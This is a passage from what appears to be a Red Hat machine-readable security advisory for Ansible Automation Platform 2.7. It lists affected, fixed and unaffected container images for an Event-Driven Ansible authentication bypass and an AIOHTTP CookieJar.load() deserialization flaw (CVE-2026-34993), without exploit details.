"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aap-gateway: aap-gateway: Authentication bypass in Event-Driven Ansible via forged HTTP header"
},
{
"cve": "CVE-2026-34993",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-06-02T20:01:12.690409+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484099"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in AIOHTTP, an asynchronous HTTP client/server framework for asyncio and Python. An attacker could exploit this vulnerability by providing untrusted input to the `CookieJar.load()` function. This could potentially lead to arbitrary code execution, allowing the attacker to run malicious code on the affected system. This issue is most likely to occur in applications that allow attacker-controlled files to be loaded.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in AIOHTTP, a Python asynchronous HTTP framework, due to potential arbitrary code execution. The vulnerability arises when applications load untrusted input into the `CookieJar.load()` function. Exploitation requires an application to be configured to process attacker-controlled files, which is not a default or common scenario in most Red Hat product deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
